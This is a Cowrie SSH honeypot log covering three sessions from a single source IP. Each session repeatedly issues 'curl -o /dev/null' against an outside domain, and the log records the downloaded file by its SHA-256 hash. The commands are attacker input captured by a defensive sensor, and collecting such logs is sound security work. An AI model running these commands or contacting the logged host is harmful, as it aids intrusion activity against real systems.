{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.019318Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.048518Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.049314Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.053115Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.056284Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.060233Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.061172Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.061846Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.064270Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.064948Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.090594Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.091382Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.097330Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.098064Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.101495Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.103641Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.104139Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.129463Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.129940Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.133117Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.136881Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.140268Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.144691Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.146786Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.148117Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.148852Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.152220Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.172184Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.173030Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.180045Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.183373Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.184215Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.205218Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.205909Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.209428Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.210627Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.211375Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.236783Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.237524Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.241824Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.244837Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.247606Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.249803Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.250579Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.252303Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.253366Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.287028Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.312308Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.315512Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.316345Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.319967Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.323134Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.323958Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.326010Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.327056Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.357526Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.358819Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.359431Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.363549Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.366198Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.367135Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.371099Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.372839Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.373653Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.400582Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.401291Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.404822Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.405964Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.431118Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.431865Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.438084Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.439630Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.441177Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:39.444544Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.445349Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.447937Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.478240Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.480490Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:39.482807Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
